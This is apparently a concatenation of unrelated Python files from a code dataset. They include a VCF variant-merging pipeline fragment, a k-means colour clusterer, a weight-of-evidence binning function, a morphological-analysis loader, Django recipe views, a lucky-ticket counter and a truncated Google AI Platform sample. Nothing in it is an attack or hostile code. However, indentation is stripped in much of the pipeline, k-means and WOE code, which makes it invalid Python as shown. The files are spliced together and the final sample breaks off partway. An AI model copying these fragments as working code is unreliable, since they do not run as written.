jsm_in = bed_include(jsm_ex, inclusion, os.sep.join(( outdir, 'snv.jsm.in.vcf')) )
intermediate_files.add(jsm_in)
else:
jsm_in = jsm_ex
jsm_out = os.sep.join(( outdir, 'snv.jsm.vcf' ))
mod_jsm.convert(jsm_in, jsm_out)
intermediate_files.add(jsm_out)
snv_intermediates.append(jsm_out)
if sniper:
import vcfModifier.modify_SomaticSniper as mod_sniper
if exclusion:
sniper_ex = bed_exclude(sniper, exclusion, os.sep.join(( outdir, 'snv.somaticsniper.ex.vcf')) )
intermediate_files.add(sniper_ex)
else:
sniper_ex = sniper
if inclusion:
sniper_in = bed_include(sniper_ex, inclusion, os.sep.join(( outdir, 'snv.somaticsniper.in.vcf')) )
intermediate_files.add(sniper_in)
else:
sniper_in = sniper_ex
sniper_out = os.sep.join(( outdir, 'snv.somaticsniper.vcf' ))
mod_sniper.convert(sniper_in, sniper_out)
intermediate_files.add(sniper_out)
snv_intermediates.append(sniper_out)
if vardict:
import vcfModifier.modify_VarDict as mod_vardict
if exclusion:
vardict_ex = bed_exclude(vardict, exclusion, os.sep.join(( outdir, 'vardict.ex.vcf')) )
intermediate_files.add(vardict_ex)
else:
vardict_ex = vardict
if inclusion:
vardict_in = bed_include(vardict_ex, inclusion, os.sep.join(( outdir, 'vardict.in.vcf')) )
intermediate_files.add(vardict_in)
else:
vardict_in = vardict_ex
snv_vardict_out = os.sep.join(( outdir, 'snv.vardict.vcf' ))
indel_vardict_out = os.sep.join(( outdir, 'indel.vardict.vcf' ))
mod_vardict.convert(vardict_in, snv_vardict_out, indel_vardict_out)
sorted_snv_vardict_out = os.sep.join(( outdir, 'snv.sort.vardict.vcf' ))
sorted_indel_vardict_out = os.sep.join(( outdir, 'indel.sort.vardict.vcf' ))
vcfsorter(ref, snv_vardict_out, sorted_snv_vardict_out)
vcfsorter(ref, indel_vardict_out, sorted_indel_vardict_out)
for file_i in snv_vardict_out, indel_vardict_out, sorted_snv_vardict_out, sorted_indel_vardict_out:
intermediate_files.add(file_i)
snv_intermediates.append(sorted_snv_vardict_out)
indel_intermediates.append(sorted_indel_vardict_out)
intermediate_vcfs['VarDict']['snv'] = sorted_snv_vardict_out
intermediate_vcfs['VarDict']['indel'] = sorted_indel_vardict_out
if muse:
if exclusion:
muse_ex = bed_exclude(muse, exclusion, os.sep.join(( outdir, 'snv.muse.ex.vcf')) )
intermediate_files.add(muse_ex)
else:
muse_ex = muse
if inclusion:
muse_in = bed_include(muse_ex, inclusion, os.sep.join(( outdir, 'snv.muse.in.vcf')) )
intermediate_files.add(muse_in)
else:
muse_in = muse_ex
muse_out = os.sep.join(( outdir, 'snv.muse.vcf' ))
copy_TextFile.copy(muse_in, muse_out)
intermediate_files.add(muse_out)
snv_intermediates.append(muse_out)
if lofreq_snv:
if exclusion:
lofreq_ex = bed_exclude(lofreq_snv, exclusion, os.sep.join(( outdir, 'snv.lofreq.ex.vcf')) )
intermediate_files.add(lofreq_ex)
else:
lofreq_ex = lofreq_snv
if inclusion:
lofreq_in = bed_include(lofreq_ex, inclusion, os.sep.join(( outdir, 'snv.lofreq.in.vcf')) )
intermediate_files.add(lofreq_in)
else:
lofreq_in = lofreq_ex
snv_lofreq_out = os.sep.join(( outdir, 'snv.lofreq.vcf' ))
copy_TextFile.copy(lofreq_in, snv_lofreq_out)
intermediate_files.add(snv_lofreq_out)
snv_intermediates.append(snv_lofreq_out)
if lofreq_indel:
if exclusion:
lofreq_ex = bed_exclude(lofreq_indel, exclusion, os.sep.join(( outdir, 'indel.lofreq.ex.vcf')) )
intermediate_files.add(lofreq_ex)
else:
            lofreq_ex = lofreq_indel
if inclusion:
lofreq_in = bed_include(lofreq_ex, inclusion, os.sep.join(( outdir, 'indel.lofreq.in.vcf')) )
intermediate_files.add(lofreq_in)
else:
lofreq_in = lofreq_ex
indel_lofreq_out = os.sep.join(( outdir, 'indel.lofreq.vcf' ))
copy_TextFile.copy(lofreq_in, indel_lofreq_out)
intermediate_files.add(indel_lofreq_out)
indel_intermediates.append(indel_lofreq_out)
if scalpel:
if exclusion:
scalpel_ex = bed_exclude(scalpel, exclusion, os.sep.join(( outdir, 'indel.scalpel.ex.vcf')) )
intermediate_files.add(scalpel_ex)
else:
scalpel_ex = scalpel
if inclusion:
scalpel_in = bed_include(scalpel_ex, inclusion, os.sep.join(( outdir, 'indel.scalpel.in.vcf')) )
intermediate_files.add(scalpel_in)
else:
scalpel_in = scalpel_ex
scalpel_out = os.sep.join(( outdir, 'indel.scalpel.vcf' ))
copy_TextFile.copy(scalpel_in, scalpel_out)
intermediate_files.add(scalpel_out)
indel_intermediates.append(scalpel_out)
if strelka_snv or strelka_indel:
import vcfModifier.modify_Strelka as mod_strelka
if strelka_snv:
if exclusion:
strelka_ex = bed_exclude(strelka_snv, exclusion, os.sep.join(( outdir, 'snv.strelka.ex.vcf')) )
intermediate_files.add(strelka_ex)
else:
strelka_ex = strelka_snv
if inclusion:
strelka_in = bed_include(strelka_ex, inclusion, os.sep.join(( outdir, 'snv.strelka.in.vcf')) )
intermediate_files.add(strelka_in)
else:
strelka_in = strelka_ex
snv_strelka_out = os.sep.join(( outdir, 'snv.strelka.vcf' ))
mod_strelka.convert(strelka_in, snv_strelka_out)
intermediate_files.add(snv_strelka_out)
snv_intermediates.append(snv_strelka_out)
if strelka_indel:
if exclusion:
strelka_ex = bed_exclude(strelka_indel, exclusion, os.sep.join(( outdir, 'indel.strelka.ex.vcf')) )
intermediate_files.add(strelka_ex)
else:
                strelka_ex = strelka_indel
if inclusion:
strelka_in = bed_include(strelka_ex, inclusion, os.sep.join(( outdir, 'indel.strelka.in.vcf')) )
intermediate_files.add(strelka_in)
else:
strelka_in = strelka_ex
indel_strelka_out = os.sep.join(( outdir, 'indel.strelka.vcf' ))
mod_strelka.convert(strelka_in, indel_strelka_out)
intermediate_files.add(indel_strelka_out)
indel_intermediates.append(indel_strelka_out)
if tnscope:
import vcfModifier.modify_MuTect2 as mod_mutect2
if exclusion:
tnscope_ex = bed_exclude(tnscope, exclusion, os.sep.join(( outdir, 'tnscope.ex.vcf')) )
intermediate_files.add(tnscope_ex)
else:
tnscope_ex = tnscope
if inclusion:
tnscope_in = bed_include(tnscope_ex, inclusion, os.sep.join(( outdir, 'tnscope.in.vcf')) )
intermediate_files.add(tnscope_in)
else:
tnscope_in = tnscope_ex
snv_tnscope_out = os.sep.join(( outdir, 'snv.tnscope.vcf' ))
indel_tnscope_out = os.sep.join(( outdir, 'indel.tnscope.vcf' ))
mod_mutect2.convert(tnscope_in, snv_tnscope_out, indel_tnscope_out, True)
for file_i in snv_tnscope_out, indel_tnscope_out:
intermediate_files.add( file_i )
snv_intermediates.append(snv_tnscope_out)
indel_intermediates.append(indel_tnscope_out)
intermediate_vcfs['TNscope']['snv'] = snv_tnscope_out
intermediate_vcfs['TNscope']['indel'] = indel_tnscope_out
# Combine SNV/INDEL variant candidates
snv_combined = os.sep.join(( outdir, 'unsorted.CombineVariants.snv.vcf' ))
indel_combined = os.sep.join(( outdir, 'unsorted.CombineVariants.indel.vcf' ))
getUniqueVcfPositions.combine(snv_intermediates, snv_combined)
getUniqueVcfPositions.combine(indel_intermediates, indel_combined)
for file_i in snv_combined, indel_combined:
intermediate_files.add( file_i )
# Sort them:
snv_combined_sorted = os.sep.join(( outdir, 'CombineVariants.snv.vcf' ))
indel_combined_sorted = os.sep.join(( outdir, 'CombineVariants.indel.vcf' ))
vcfsorter(ref, snv_combined, snv_combined_sorted)
vcfsorter(ref, indel_combined, indel_combined_sorted)
if not keep_intermediates:
for file_i in intermediate_files:
subprocess.call( ('rm', '-v', file_i ) )
return snv_combined_sorted, indel_combined_sorted, intermediate_vcfs, intermediate_files
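
# Usage sketch (all file paths are hypothetical):
#   snv_vcf, indel_vcf, vcfs, tmp = combinePaired(
#       outdir='/tmp/combined', ref='GRCh38.fa', tbam='tumor.bam', nbam='normal.bam',
#       mutect2='MuTect2.vcf', varscan_snv='varscan.snp.vcf',
#       varscan_indel='varscan.indel.vcf', strelka_snv='somatic.snvs.vcf',
#       strelka_indel='somatic.indels.vcf')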
| [
"[email protected]"
] | |
b6bdc8f40c3a821677c921ecff412bb789fb3fa1 | 63f702bec4b674da982b793eb5611485c5f174c6 | /K-Means/kmeans.py | e755b601c25de648c4aa0326dc8a7f9fa4feb412 | [] | no_license | sinderoth/Machine-learning | 3783959b538cd1c37fc93c7c5153e35910a5e966 | f0fb3da16d55f659d54a3afe42290a490f59f585 | refs/heads/main | 2023-06-13T07:17:28.173809 | 2021-06-29T19:02:11 | 2021-06-29T19:02:11 | 313,746,974 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,063 | py | import math
import random
import numpy as np
import copy
random.seed(5710414)
class KMeans:
def __init__(self, X, n_clusters, max_iterations=1000, epsilon=0.01, distance_metric="manhattan"):
self.X = X
self.n_clusters = n_clusters
self.distance_metric = distance_metric
self.clusters = []
self.cluster_centers = []
self.epsilon = epsilon
self.max_iterations = max_iterations
def fit(self):
center = []
for i in range(self.n_clusters):
            center.append(self.generate_random_color())
mind = self.findClusterIndex(self.X,center,self.distance_metric)
mind = np.asarray(mind)
eps = center
for i in range(self.max_iterations):
print ("KMeans iteration: "+ str(i+1))
center = []
for j in range(self.n_clusters):
if len(self.X[mind==j])> 0:
average = np.mean(self.X[mind==j],axis=0)
else:
average = (0,0,0)
center.append(average)
mind = self.findClusterIndex(self.X,center,self.distance_metric)
mind = np.asarray(mind)
            self.clusters = mind
self.cluster_centers = center
if self.epsilonCheck(center,eps,self.n_clusters,self.epsilon) == True:
print ("Epsilon boundary reached! Halting...")
return
eps = center
print ("Max iterations reached! Halting...")
    # predict the cluster index for a given (r, g, b) value
    def predict(self, instance):
        if not isinstance(instance, list):
            instance = [instance]
        a = self.findClusterIndex(instance, self.cluster_centers, self.distance_metric)
        return a[0]
# generate random color for initialization of kmeans
def generate_random_color(self):
return int(random.uniform(0, 256)), int(random.uniform(0, 256)), int(random.uniform(0, 256))
    # distance from every sample in a to each cluster center in b;
    # returns an (n_samples, n_clusters) matrix
    def calculateDistance(self, a, b, metric):
        a = np.asarray(a)
        b = np.asarray(b)
        if metric == "manhattan":
            dist = np.sum(np.abs(a - b[0, :]), axis=1).reshape(-1, 1)
            for i in range(1, self.n_clusters):
                dist = np.append(dist, np.sum(np.abs(a - b[i, :]), axis=1).reshape(-1, 1), axis=1)
        else:
            dist = np.linalg.norm(a - b[0, :], axis=1).reshape(-1, 1)
            for i in range(1, self.n_clusters):
                dist = np.append(dist, np.linalg.norm(a - b[i, :], axis=1).reshape(-1, 1), axis=1)
        return dist
# return cluster indices
def findClusterIndex(self,x,center,metric):
dist = self.calculateDistance(x,center,metric)
ls = np.argmin(dist,axis=1)
return ls
# naive epsilon check for halt
def epsilonCheck(self,c,e,k,epsilon):
for i in range(k):
if math.sqrt( ( (c[i][0]-e[i][0])**2 + (c[i][1]-e[i][1])**2 + (c[i][2]-e[i][2])**2 )) > epsilon:
return False
return True | [
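
# Example usage (sketch): cluster 500 random RGB triples into 4 color groups.
if __name__ == "__main__":
    pixels = np.array([[random.randint(0, 255) for _ in range(3)] for _ in range(500)])
    km = KMeans(pixels, n_clusters=4, max_iterations=20, distance_metric="euclidean")
    km.fit()
    print(km.predict((120, 200, 40)))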
"[email protected]"
] | |
9f97c3870679ef7592e94f1c166d780fd092ecbb | 79b390363bee87a0f112a1890e7c3784a74df5a2 | /feature_selection/add_woe_dynamic.py | 395311eb22a36aca6a4d0b6477fa51f0403d9707 | [] | no_license | hbwzhsh/machine_model | 12194599c1385c078a8f8828c293040f835eb14a | 8e6151492898691b48a2c3b240880fabe41d155b | refs/heads/master | 2021-05-12T03:20:14.329296 | 2016-09-06T08:40:46 | 2016-09-06T08:40:46 | 117,614,763 | 1 | 0 | null | 2018-01-16T01:28:22 | 2018-01-16T01:28:22 | null | UTF-8 | Python | false | false | 2,552 | py | #-*- coding: utf-8 -*-
import pandas as pd
import numpy as np
# WOE computation for IV that dynamically merges bins whose good/bad count is zero.
# `dataframe` must contain the 'y' label column and the count column used by pivot_table.
# If series_1 is indexed by intervals, the feature column in `dataframe` must be binned
# into the same intervals, otherwise the final mapping cannot be computed.
def add_woe_dynamic(dataframe, series_1, series_0, feature_name):
temp = pd.DataFrame(series_1).copy()
temp['woe'] = 0
total_1 = series_1.sum()
total_0 = series_0.sum()
length = len(series_1)
j = 0
index_list = []
while j <= length-1:
if series_1.iloc[j] == 0 and series_0.iloc[j] != 0:
sub_index = []
while j<=length-1:
sub_index.append(series_1.index[j])
if series_1.iloc[j] != 0:
break
j += 1
index_list.append(sub_index)
j += 1
elif series_1.iloc[j] != 0 and series_0.iloc[j] == 0:
sub_index = []
while j<=length-1:
sub_index.append(series_1.index[j])
if series_0.iloc[j] != 0:
break
j += 1
index_list.append(sub_index)
j += 1
elif series_1.iloc[j] == 0 and series_0.iloc[j] == 0:
sub_index = []
while j<=length-1:
sub_index.append(series_1.index[j])
if series_1.iloc[j] != 0 and series_0.iloc[j] != 0:
break
j += 1
index_list.append(sub_index)
j += 1
else :
index_list.append([series_1.index[j]])
j += 1
if len(index_list)>=3:
if series_1[index_list[-1]].sum() == 0 or series_0[index_list[-1]].sum() == 0:
temp = index_list.pop()
index_list[-1].extend(temp)
if len(index_list)==1:
        print('woe_error')
return 0
if len(index_list)==2:
if series_1[index_list[-1]].sum() == 0 or series_0[index_list[-1]].sum() == 0:
            print('woe_error')
return 0
for i in index_list:
good = series_1[i].sum()*1.0/total_1
bad = series_0[i].sum()*1.0/total_0
temp.loc[i,'woe'] = np.log(good/bad)
    # persist the WOE mapping to a file
with open('/home/jinzitian/machine_model/data/%s_woe'%feature_name,'w') as a:
a.write(str({temp.index[i]:temp['woe'].iloc[i] for i in range(len(temp['woe']))}))
dataframe[feature_name + '_woe'] = dataframe[feature_name].map(lambda x:temp['woe'].loc[x])
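
# Usage sketch (column names are hypothetical): series_1/series_0 hold per-bin
# counts of positive/negative samples, aligned on the binned feature values.
#   good = df[df['y'] == 1].pivot_table(index='age_bin', values='y', aggfunc='count')['y']
#   bad = df[df['y'] == 0].pivot_table(index='age_bin', values='y', aggfunc='count')['y']
#   add_woe_dynamic(df, good, bad, 'age_bin')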
| [
"[email protected]"
] | |
3234a40720adb1820739571e807eb92f143a513b | df100eb20af5b2be0b0642cfd7fd02958497de0a | /convertors/simple_convertors/analyzer.py | 6e165e54b214750a21b393e04f2ff1f22a31c218 | [] | no_license | LingConLab/Bashkir_corpus | 2d3c5292c81eea08f2b9ba0f51e724c5b06b31f4 | 2798c0d6498d0aac7c41f44abe73bc7a1e2e618a | refs/heads/master | 2021-06-18T14:33:49.640984 | 2021-01-28T12:24:12 | 2021-01-28T12:24:12 | 157,969,267 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,005 | py | import re
import copy
import os
class DumbMorphParser:
"""
Contains methods that add context-independent word-level
morhological information from a parsed word list to a
collection of JSON sentences. No actual parsing takes
place here.
"""
rxWordsRNC = re.compile('<w>(<ana.*?/(?:ana)?>)([^<>]+)</w>', flags=re.DOTALL)
rxAnalysesRNC = re.compile('<ana *([^<>]+)(?:></ana>|/>)\\s*')
rxAnaFieldRNC = re.compile('([^ <>"=]+) *= *"([^<>"]+)')
rxSplitGramTags = re.compile('[, /=]')
rxHyphenParts = re.compile('[^\\-]+|-+')
rxGlossParts = re.compile('[^ \\-=<>]+')
rxGlossIndexPart = re.compile('^(.*)\\{(.*?)\\}')
def __init__(self, settings, categories, errorLog='errorLog.txt'):
self.settings = copy.deepcopy(settings)
self.categories = copy.deepcopy(categories)
self.rxAllGlosses = self.prepare_gloss_regex()
self.analyses = {}
self.errorLog = errorLog
if ('parsed_wordlist_filename' in self.settings
and len(self.settings['parsed_wordlist_filename']) > 0):
if type(self.settings['parsed_wordlist_filename']) == str:
self.load_analyses(os.path.join(self.settings['corpus_dir'],
self.settings['parsed_wordlist_filename']))
else:
for language in self.settings['parsed_wordlist_filename']:
self.load_analyses(os.path.join(self.settings['corpus_dir'],
self.settings['parsed_wordlist_filename'][language]),
language)
def log_message(self, message):
"""
If the filename of the error log is not empty, append
the message to the file.
"""
if self.errorLog is None or len(self.errorLog) <= 0:
return
try:
fLog = open(self.errorLog, 'a', encoding='utf-8')
fLog.write(message + '\n')
fLog.close()
except:
return
def load_analyses(self, fname, lang=''):
"""
Load parsed word list from a file.
"""
if lang == '':
if 'languages' in self.settings and len(self.settings['languages']) > 0:
lang = self.settings['languages'][0]
else:
lang = self.settings['corpus_name']
self.analyses[lang] = {}
try:
f = open(fname, 'r', encoding='utf-8-sig')
text = f.read()
f.close()
if self.settings['parsed_wordlist_format'] == 'xml_rnc':
self.load_analyses_xml_rnc(text, lang=lang)
except FileNotFoundError:
            print('File not found: ' + fname)
            self.log_message('File not found: ' + fname)
def transform_gramm_str(self, grStr, lang=''):
"""
Transform a string with gramtags into a JSON object.
"""
grJSON = {}
grTags = self.rxSplitGramTags.split(grStr)
for tag in grTags:
if len(tag.strip()) <= 0:
continue
if tag not in self.categories[lang]:
print('No category for a gramtag:', tag, ', language:', lang)
continue
cat = 'gr.' + self.categories[lang][tag]
if cat not in grJSON:
grJSON[cat] = tag
else:
if type(grJSON[cat]) != list:
grJSON[cat] = [grJSON[cat]]
if tag not in grJSON[cat]:
grJSON[cat].append(tag)
return grJSON
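
    # Example (sketch): with self.categories[lang] = {'pl': 'number', 'dat': 'case'},
    # transform_gramm_str('pl,dat', lang) returns {'gr.number': 'pl', 'gr.case': 'dat'}.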
def prepare_gloss_regex(self):
"""
Return a regex that finds all glosses.
"""
regexes = {}
for lang in self.settings['languages']:
if lang not in self.categories:
self.categories[lang] = {}
if 'glosses' in self.settings and lang in self.settings['glosses']:
sRegex = '|'.join(re.escape(g) for g in sorted(self.settings['glosses'][lang], key=len))
sRegex = '\\b(' + sRegex + ')\\b'
regexes[lang] = re.compile(sRegex)
else:
sRegex = '|'.join(re.escape(g) for g in sorted(self.categories[lang], key=len))
sRegex = '\\b(' + sRegex + ')\\b'
regexes[lang] = re.compile(sRegex, flags=re.I)
return regexes
def gloss2gr(self, ana, lang):
"""
For an analysis that has glosses, but no tags for inflectional
categories, add these categories.
"""
# TODO: Add rules for translating the glosses into tags.
if 'gloss_index' not in ana:
return
glosses = self.rxAllGlosses[lang].findall(ana['gloss_index'])
for gloss in glosses:
if gloss.lower() in self.categories[lang]:
field = 'gr.' + self.categories[lang][gloss.lower()]
if field not in ana:
ana[field] = gloss.lower()
else:
if type(ana[field]) == str:
ana[field] = [ana[field]]
if gloss.lower() not in ana[field]:
ana[field].append(gloss.lower())
def find_stems(self, glossIndex, lang):
"""
Return all glosses that are not in the categories list, and
therefore are the glosses for the stem.
"""
stems = []
newIndexGloss = ''
for glossPart in glossIndex.split('-'):
if len(glossPart) <= 0:
continue
m = self.rxGlossIndexPart.search(glossPart)
if m is None:
newIndexGloss += glossPart + '-'
continue
gloss, part = m.group(1), m.group(2)
if self.rxAllGlosses[lang].match(gloss) is None:
stems.append((gloss, part))
newIndexGloss += 'STEM{' + part + '}-'
else:
newIndexGloss += glossPart + '-'
return stems, newIndexGloss
def process_gloss_in_ana(self, ana):
"""
If there are fields 'gloss' and 'parts' in the JSON
analysis, add field 'gloss_index' that contains the
glossed word in such a form that it could be queried
with the gloss query language.
Modify the source analysis, do not return anything.
"""
if 'gloss' not in ana or 'parts' not in ana:
return
        wordParts = self.rxGlossParts.findall(ana['parts'].replace('{', '(').replace('}', ')'))
glosses = self.rxGlossParts.findall(ana['gloss'])
if len(wordParts) <= 0 or len(glosses) == 0 or len(wordParts) != len(glosses):
self.log_message('Wrong gloss or partitioning: ' + ana['parts'] + ' != ' + ana['gloss'])
return
glossIndex = '-'.join(p[1] + '{' + p[0] + '}'
for p in zip(wordParts, glosses)) + '-'
ana['gloss_index'] = glossIndex
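
    # Example (sketch): parts='kitap-lar' with gloss='book-PL' produces
    # ana['gloss_index'] = 'book{kitap}-PL{lar}-'.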
def transform_ana_rnc(self, ana, lang=''):
"""
Transform analyses for a single word, written in the XML
format used in Russian National Corpus, into a JSON object.
"""
setAna = set(self.rxAnalysesRNC.findall(ana.replace('\t', '')))
analyses = []
for ana in setAna:
fields = self.rxAnaFieldRNC.findall(ana)
if len(fields) <= 0:
continue
anaJSON = {}
for k, v in fields:
if k == 'gr':
anaJSON.update(self.transform_gramm_str(v, lang=lang))
else:
anaJSON[k] = v
self.process_gloss_in_ana(anaJSON)
analyses.append(anaJSON)
return analyses
def load_analyses_xml_rnc(self, text, lang=''):
"""
Load analyses from a string in the XML format used
in Russian National Corpus.
"""
if lang == '':
if 'languages' in self.settings and len(self.settings['languages']) > 0:
lang = self.settings['languages'][0]
else:
lang = self.settings['corpus_name']
# there can be several languages if the corpus is parallel
analyses = self.rxWordsRNC.findall(text)
if lang not in self.analyses:
self.analyses[lang] = {}
iAna = 1
print('Loading analyses...')
for ana in analyses:
if iAna % 20000 == 0:
print('Loading analysis #' + str(iAna))
word = ana[1].strip('$&^#%*·;·‒–—―•…‘’‚“‛”„‟"\'')
if len(word) <= 0:
continue
if iAna <= 50000: # We assume the analyses are ordered by word frequency
ana = self.transform_ana_rnc(ana[0], lang=lang)
else:
ana = ana[0] # Avoid huge memory consumption at the expense of time
if word not in self.analyses[lang]:
self.analyses[lang][word] = ana
iAna += 1
print('Analyses for', len(self.analyses[lang]), 'different words loaded.')
def normalize(self, word):
"""
Normalize a word before searching for it in the list of analyses.
"""
return word.strip().lower()
def analyze_word(self, wf, lang=''):
if lang not in self.analyses:
return []
if wf not in self.analyses[lang] and (wf.startswith('-') or wf.endswith('-')):
wf = wf.strip('-')
if wf in self.analyses[lang]:
ana = self.analyses[lang][wf]
if type(ana) == str and self.settings['parsed_wordlist_format'] == 'xml_rnc':
analyses = self.transform_ana_rnc(ana, lang=lang)
else:
analyses = copy.deepcopy(self.analyses[lang][wf])
else:
analyses = []
return analyses
def analyze_hyphened_word(self, words, iWord, lang=''):
"""
Try to analyze a word that contains a hyphen but could
not be analyzed as a whole. Split the word in several,
if needed.
"""
word = words[iWord]
parts = self.rxHyphenParts.findall(word['wf'])
partAnalyses = []
for iPart in range(len(parts)):
if parts[iPart].startswith('-'):
partAnalyses.append(None)
continue
wfPart = self.normalize(parts[iPart])
if iPart > 0:
wfPart = '-' + wfPart
if iPart < len(parts) - 1:
wfPart += '-'
partAna = self.analyze_word(wfPart, lang)
partAnalyses.append(partAna)
if any(pa is not None and len(pa) > 0 for pa in partAnalyses):
offStart = word['off_start']
newWords = [copy.deepcopy(word) for i in range(len(partAnalyses))]
for i in range(len(newWords)):
newWords[i]['wf'] = parts[i]
newWords[i]['off_start'] = offStart
offStart += len(newWords[i]['wf'])
newWords[i]['off_end'] = offStart
if i < len(newWords) - 1:
newWords[i]['next_word'] = iWord + i + 1
else:
newWords[i]['next_word'] += len(newWords) - 1
if newWords[i]['wf'].startswith('-'):
newWords[i]['wtype'] = 'punct'
else:
newWords[i]['ana'] = partAnalyses[i]
words.pop(iWord)
for i in range(len(words)):
if words[i]['next_word'] > iWord:
words[i]['next_word'] += len(newWords) - 1
for i in range(len(newWords)):
words.insert(iWord + i, newWords[i])
# print(words)
return len(newWords) - 1
return 0
def analyze_sentence(self, s, lang=''):
"""
Analyze each word in one sentence using preloaded analyses.
Return statistics.
"""
nTokens, nWords, nAnalyzed = 0, 0, 0
if lang == '':
if 'languages' in self.settings and len(self.settings['languages']) > 0:
lang = self.settings['languages'][0]
else:
lang = self.settings['corpus_name']
if 'words' not in s:
return 0, 0, 0
iWord = -1
while iWord < len(s['words']) - 1:
iWord += 1
nTokens += 1
word = s['words'][iWord]
if word['wtype'] != 'word':
continue
nWords += 1
wf = self.normalize(word['wf'])
analyses = self.analyze_word(wf, lang)
if len(analyses) > 0:
word['ana'] = analyses
nAnalyzed += 1
elif '-' in word['wf']:
iWord += self.analyze_hyphened_word(s['words'], iWord, lang)
return nTokens, nWords, nAnalyzed
def analyze(self, sentences, lang=''):
"""
Analyze each word in each sentence using preloaded analyses.
Return statistics.
"""
nTokens, nWords, nAnalyzed = 0, 0, 0
if lang == '':
if 'languages' in self.settings and len(self.settings['languages']) > 0:
lang = self.settings['languages'][0]
else:
lang = self.settings['corpus_name']
for s in sentences:
nTokensCur, nWordsCur, nAnalyzedCur = self.analyze_sentence(s, lang)
nTokens += nTokensCur
nWords += nWordsCur
nAnalyzed += nAnalyzedCur
return nTokens, nWords, nAnalyzed
| [
"[email protected]"
] | |
765c98c8dd00c1b34bb4f6c1d9611de782fb19f1 | 05da5f5a21ce358f621d12291bee8a1e912319b2 | /madefood/polls/views.py | 16c35f32d140a71a3be272b635ba887ea5a536f4 | [] | no_license | Kamilstepniewski/DjangoProject-Recipe_App | 904ddf31a5ba5754bdc806888b39f9d64b791e81 | 54f78cbbe1a3520624bd96be467dbe429171d706 | refs/heads/master | 2020-05-09T13:40:14.445001 | 2019-04-20T15:29:05 | 2019-04-20T15:29:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 968 | py | from django.shortcuts import get_object_or_404,render
from django.http import HttpResponse
from .models import Poll,Comment
# Create your views here.
def polls_list(request):
recipes = Poll.objects.all()
context = {'recipes': recipes}
return render(request,'polls/recipes.html', context)
def recipes_detail(request,recipes_id):
# return HttpResponse('Youre looking for recipe id:{}'.format(recipes_id))
# recipes = Poll.objects.get(id=recipes_id)
recipes = get_object_or_404(Poll, id=recipes_id)
if request.method == "POST":
print(request.POST)
print("You Posted!!!!")
if request.method == "GET":
print(request.GET)
print("You Get Me")
context = {'recipes': recipes}
return render(request,'polls/recipes_detail.html',context)
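
# Illustrative request flow for the vote view below (field names as in the
# code): POSTing comment=<comment_id> increments that comment's vote count
# and echoes the recipe id back in the response.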
def recipes_vote(request,recipes_id):
comment_id = request.POST['comment']
comment = Comment.objects.get(id=comment_id)
comment.votes += 1
comment.save()
return HttpResponse('Recipe Id: {}'.format(recipes_id))
| [
"[email protected]"
] | |
0437d45df3907592b0a10dd025509d6c0f01a063 | cb3753caf27ab53e3dcf187b89a3f58ba93a6562 | /Rotate String.py | b90c4ea458a338c550f1f13262077306c76b3db4 | [] | no_license | robertchengkt/LintCode | dc4d5c14867d66ee21b617ef4ccab218fadc809f | 7f7066d0807654af9b13aa16df2e3b737793af3f | refs/heads/master | 2020-04-15T14:31:06.312510 | 2016-10-29T03:36:06 | 2016-10-29T03:36:06 | 49,547,326 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 417 | py | class Solution:
# @param s: a list of char
# @param offset: an integer
    # @return: the rotated string
    def rotateString(self, s, offset):
        # write your code here
        chrList = list(s)
        if chrList:
            offset %= len(chrList)  # guard against offsets longer than the string
        if offset == 0:
            newList = chrList
        else:
            # right-rotate: move the last `offset` chars to the front, in order
            newList = chrList[-offset:] + chrList[:-offset]
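        # e.g. list("abcdef") rotated right by 2 yields "efabcd"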
return "".join(newList) | [
"[email protected]"
] | |
2e029ba1eb517c3e91b40586e221617bef7cc79c | ddf89d98c7fa2cfe4a64c5a9796dd06bf0b2b6ca | /test.py | b43c4224965c2b98c2e82198e190cbc6931c15ce | [] | no_license | kgerman84/Test | 855bbcfb7935b72ace9409cb9e0348b90577ded6 | 13e9651ec04a40de98b5a73527e14ea9ea79de33 | refs/heads/master | 2021-01-10T22:47:23.848331 | 2016-10-10T10:29:50 | 2016-10-10T10:29:50 | 70,351,092 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 319 | py | #!/usr/bin/env python
import sys
a1 = int(sys.argv[1])
a2 = int(sys.argv[2])
caunt = 0  # running count of "lucky" numbers in the range
for i in range(a1, a2 + 1):
    # lucky: the sum of the three lowest digits equals the sum of digits
    # four to six, e.g. 123006 is counted since 0+0+6 == 1+2+3
    if ((i % 10 + i % 100 // 10 + i % 1000 // 100)
            == (i % 10000 // 1000 + i % 100000 // 10000 + i % 1000000 // 100000)):
        caunt = caunt + 1
with open('test.txt', 'w') as f:
    f.write(str(caunt))
print caunt
| [
"[email protected]"
] | |
3da2c220a49a54cea7eca6b1aa7aff30b2b7c283 | 99dcb18a9e3ea367272f740b8cbf3c34285a0c08 | /samples/generated_samples/aiplatform_generated_aiplatform_v1_tensorboard_service_write_tensorboard_run_data_sync.py | b29147d3fc8c9dc447b2e378c7ab7777942fd231 | [
"Apache-2.0"
] | permissive | googleapis/python-aiplatform | 926a4873f35dbea15b2fd86c0e16b5e6556d803e | 76b95b92c1d3b87c72d754d8c02b1bca652b9a27 | refs/heads/main | 2023-08-19T23:49:02.180075 | 2023-08-19T13:25:59 | 2023-08-19T13:27:27 | 298,017,988 | 418 | 240 | Apache-2.0 | 2023-09-14T21:08:33 | 2020-09-23T15:43:39 | Python | UTF-8 | Python | false | false | 1,814 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
#
# Snippet for WriteTensorboardRunData
# NOTE: This snippet has been automatically generated for illustrative purposes only.
# It may require modifications to work in your environment.
# To install the latest published package dependency, execute the following:
# python3 -m pip install google-cloud-aiplatform
# [START aiplatform_generated_aiplatform_v1_TensorboardService_WriteTensorboardRunData_sync]
from google.cloud import aiplatform_v1
def sample_write_tensorboard_run_data():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
time_series_data = aiplatform_v1.TimeSeriesData()
